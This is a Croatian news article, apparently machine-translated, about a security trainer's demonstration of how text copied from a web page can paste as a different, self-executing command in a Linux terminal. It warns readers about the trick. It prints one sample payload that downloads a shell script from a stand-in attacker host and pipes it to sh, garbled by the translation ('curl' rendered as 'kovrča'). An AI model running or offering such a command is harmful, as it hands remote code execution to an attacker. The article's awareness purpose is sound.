- Svi svakodnevno kopiramo i lijepimo s interneta, a da zapravo ne znamo za rizike.
- Stručnjak za sigurnost je uzeo vremena da pokaže svima najgori scenarij kada je to radio.
- Lijepljenje naredbi koje ste dobili s interneta u svoj terminal brz je način da budete hakirani
- Naredbe za koje ste mislili da ih lijepite u svoj terminal zapravo su zlonamjerni kodovi.
Istina je da živimo u eri u kojoj je brzina sve, a postizanje brzih rezultata jedino što je važno. Međutim, malo ljudi zapravo stane na sekundu i razmišlja o posljedicama.
Svakodnevno milijuni programera, administratora i sigurnosnih istraživača izvode jednostavne zadatke poput kopiranja i lijepljenja naredbi s web stranica izravno u konzole na svojim računalima.
Iako mnogi o tome uopće ne razmišljaju, implikacije su veće i opasnije nego što mislite na prvu, pogotovo ako pohranjujete osjetljive ili vrijedne podatke.
Poznati stručnjak za sigurnost odvojio je vrijeme da podijeli što bi se zapravo moglo dogoditi ako kopirate i zalijepite sadržaj s web stranica.
Copy+Paste jednostavan je način da vas zapravo hakiraju
Gabriel Friedlander, koji je osnivač platforme za obuku svijesti o sigurnosti Wizer, povukao je naslovnicu sa sheme koja će vas natjerati da dvaput razmislite prije kopiranja i lijepljenja naredbi s web stranica.
Kopiranje i lijepljenje sadržaja s interneta postalo je toliko uobičajeno u današnje vrijeme da nitko o tome ne razmišlja.
Međutim, Friedlander upozorava da su neke web stranice varljivije nego što bi se na prvi pogled moglo shvatiti, a ono što mislite da ste s njih kopirali uvelike se razlikuje od onoga što ste zapravo učinili.
A najgore u svemu ovome je to što žrtve, bez potrebnog znanja ili vodstva, shvate svoju pogrešku tek nakon što zalijepe tekst, u kojem trenutku već može biti prekasno.
Sigurnosni analitičar također je osmislio mali test za čitatelje svog bloga, samo kako bi ljudi mogli shvatiti koliko vam je lako nevoljno otvoriti vrata kibernetičkim kriminalcima.
Dao je naredbu koja je namijenjena za kopiranje, ali istina se otkriva tek kada zalijepite tekst i vidite što ste zapravo uveli u svoje postavke.
Nakon kopiranja naredbe prikazane na gornjoj snimci zaslona, rezultat lijepljenja će vas šokirati, jer je daleko od onoga što ste mislili da duplicirate.
kovrča http://attacker-domain: 8000/shell.sh | shOsim potpuno drugačije naredbe prisutne u vašem međuspremniku, znak za novi red (ili povratak) na kraj znači da će se gornji primjer izvršiti čim se zalijepi izravno u Linux terminal.
Stoga je bolje da budete svjesniji onoga što se zapravo događa i tretirajte to kao ozbiljnu opasnost za sigurnost. Ne kažemo da sve web stranice skrivaju zlonamjerni sadržaj, ali to se isplati uzeti u obzir.
Jeste li ikada bili hakirani zbog lijepljenja lukavih naredbi u svoj terminal? Podijelite svoje iskustvo s nama u odjeljku za komentare ispod.
![Može li vas hakirati QR kod? [Vodič za prevenciju]](/f/67281e591af022db3345bf9bdf137753.jpg?width=300&height=460)